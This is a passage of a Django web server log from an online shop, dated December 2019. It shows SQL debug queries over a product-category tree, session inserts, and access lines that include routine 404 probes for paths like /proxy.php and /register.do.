"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 13:13:56,354 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 13:13:56,357 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 13:13:56,359 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 13:13:56,362 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 13:13:56,364 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 13:13:56,366 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 13:13:56,370 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 13:13:56,372 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 13:13:56,378 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 13:13:56,381 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 13:13:56,383 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 13:13:56,385 utils 2749 140297254205184 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 13:13:56,385 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 13:13:56,392 utils 2749 140297254205184 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 13:13:56,395 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 13:13:56,398 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) [27/Dec/2019 13:13:56] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 13:13:56,401 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 13:13:56,403 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 13:13:56,405 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 13:13:56,408 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 13:13:56,411 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 13:13:56,413 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 13:13:56,415 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 13:13:56,418 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 13:13:56,422 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 13:13:56,424 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 13:13:56,426 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 13:13:56,428 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 13:13:56,431 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 13:13:56,433 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 13:13:56,436 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 13:13:56,438 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 13:13:56,440 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 13:13:56,443 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 13:13:56,445 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 13:13:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 13:16:24] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:22:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 13:22:22,997 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uh7igohmnn5g4kji5g919n0jd6swa21e' LIMIT 1; args=('uh7igohmnn5g4kji5g919n0jd6swa21e',) DEBUG 2019-12-27 13:22:22,999 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uh7igohmnn5g4kji5g919n0jd6swa21e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T13:22:22.997738+00:00'::timestamptz); args=('uh7igohmnn5g4kji5g919n0jd6swa21e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 13, 22, 22, 997738, tzinfo=)) [27/Dec/2019 13:22:23] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 13:24:10] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:31:28] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:36:31] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:45:55] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:52:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:59:54] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:13:13] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:18:15] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:23:18] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:28:21] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:33:53] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:38:56] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:48:21] "GET / HTTP/1.0" 302 0 [27/Dec/2019 14:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 14:55:25] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:10:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:15:40] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:20:43] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:26:42] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:33:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 15:33:08,507 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6zwc0agxie25qv98bik207qo83szq5ry' LIMIT 1; args=('6zwc0agxie25qv98bik207qo83szq5ry',) DEBUG 2019-12-27 15:33:08,510 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6zwc0agxie25qv98bik207qo83szq5ry', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T15:33:08.508423+00:00'::timestamptz); args=('6zwc0agxie25qv98bik207qo83szq5ry', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 15, 33, 8, 508423, tzinfo=)) [27/Dec/2019 15:33:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 15:34:58] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:40:20] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:46:57] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:56:51] "GET / HTTP/1.0" 302 0 [27/Dec/2019 15:57:33] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [27/Dec/2019 15:57:48] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [27/Dec/2019 15:57:50] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=207 HTTP/1.0" 404 6422 Not Found: /newslist.asp [27/Dec/2019 15:57:51] "GET /newslist.asp?type=4&id=1376 HTTP/1.0" 404 6366 [27/Dec/2019 16:02:16] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 16:10:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:18:23] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:23:26] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:28:29] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:31:43] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:33:43] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:38:46] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:43:48] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:48:51] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:53:54] "GET / HTTP/1.0" 302 0 [27/Dec/2019 16:59:13] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [27/Dec/2019 17:03:57] "GET /proxy.php HTTP/1.0" 404 6344 [27/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:19:26] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:24:29] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:29:31] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:39:14] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:44:16] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:50:01] "GET / HTTP/1.0" 302 0 [27/Dec/2019 17:55:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:15:44] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:21:36] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:26:39] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:31:42] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:36:44] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:37:24] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:42:18] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:48:21] "GET / HTTP/1.0" 302 0 [27/Dec/2019 18:53:28] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:00:02] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:10:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:15:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:21:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 19:26:49] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:31:52] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:36:55] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:43:32] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:48:35] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:53:37] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:56:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:58:40] "GET / HTTP/1.0" 302 0 [27/Dec/2019 19:59:56] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 Not Found: /register.do [27/Dec/2019 20:05:06] "GET /register.do HTTP/1.0" 404 6344 Not Found: /register.do [27/Dec/2019 20:05:06] "GET /register.do HTTP/1.0" 404 6344 DEBUG 2019-12-27 20:05:06,610 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cl'; args=('cl',) Not Found: /cl/ [27/Dec/2019 20:05:06] "GET /cl/?module=System&method=MAdvertis&other= HTTP/1.0" 404 1767 DEBUG 2019-12-27 20:05:06,756 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cl'; args=('cl',) Not Found: /cl/ [27/Dec/2019 20:05:06] "GET /cl/?module=System&method=MAdvertis&other= HTTP/1.0" 404 1767 Not Found: /entrance/page/registermember [27/Dec/2019 20:05:06] "GET /entrance/page/registermember HTTP/1.0" 404 6395 Not Found: /entrance/page/registermember [27/Dec/2019 20:05:07] "GET /entrance/page/registermember HTTP/1.0" 404 6395 [27/Dec/2019 20:05:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 20:05:07,286 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bifowt8jl709199e15a2bjixc7uf0xx3' LIMIT 1; args=('bifowt8jl709199e15a2bjixc7uf0xx3',) DEBUG 2019-12-27 20:05:07,289 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bifowt8jl709199e15a2bjixc7uf0xx3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T20:05:07.287543+00:00'::timestamptz); args=('bifowt8jl709199e15a2bjixc7uf0xx3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 20, 5, 7, 287543, tzinfo=)) [27/Dec/2019 20:05:07] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 20:05:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 20:05:07,518 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8eq0fro8wapcudimvod00p3qvnwluy7h' LIMIT 1; args=('8eq0fro8wapcudimvod00p3qvnwluy7h',) DEBUG 2019-12-27 20:05:07,521 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8eq0fro8wapcudimvod00p3qvnwluy7h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T20:05:07.519052+00:00'::timestamptz); args=('8eq0fro8wapcudimvod00p3qvnwluy7h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 20, 5, 7, 519052, tzinfo=)) [27/Dec/2019 20:05:07] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /hhcp/register.html [27/Dec/2019 20:05:07] "GET /hhcp/register.html HTTP/1.0" 404 6365 Not Found: /hhcp/register.html [27/Dec/2019 20:05:07] "GET /hhcp/register.html HTTP/1.0" 404 6365 [27/Dec/2019 20:05:07] "GET /Register HTTP/1.0" 301 0 DEBUG 2019-12-27 20:05:08,004 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Register'; args=('Register',) Not Found: /Register/ [27/Dec/2019 20:05:08] "GET /Register/ HTTP/1.0" 404 1733 [27/Dec/2019 20:05:08] "GET /Register HTTP/1.0" 301 0 DEBUG 2019-12-27 20:05:08,220 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Register'; args=('Register',) Not Found: /Register/ [27/Dec/2019 20:05:08] "GET /Register/ HTTP/1.0" 404 1733 [27/Dec/2019 20:05:08] "GET /PageRegister?uid= HTTP/1.0" 301 0 DEBUG 2019-12-27 20:05:08,438 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'PageRegister'; args=('PageRegister',) Not Found: /PageRegister/ [27/Dec/2019 20:05:08] "GET /PageRegister/?uid= HTTP/1.0" 404 1746 [27/Dec/2019 20:05:08] "GET /PageRegister?uid= HTTP/1.0" 301 0 DEBUG 2019-12-27 20:05:08,648 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'PageRegister'; args=('PageRegister',) Not Found: /PageRegister/ [27/Dec/2019 20:05:08] "GET /PageRegister/?uid= HTTP/1.0" 404 1746 Not Found: /cn/register [27/Dec/2019 20:05:08] "GET /cn/register HTTP/1.0" 404 6344 Not Found: /cn/register 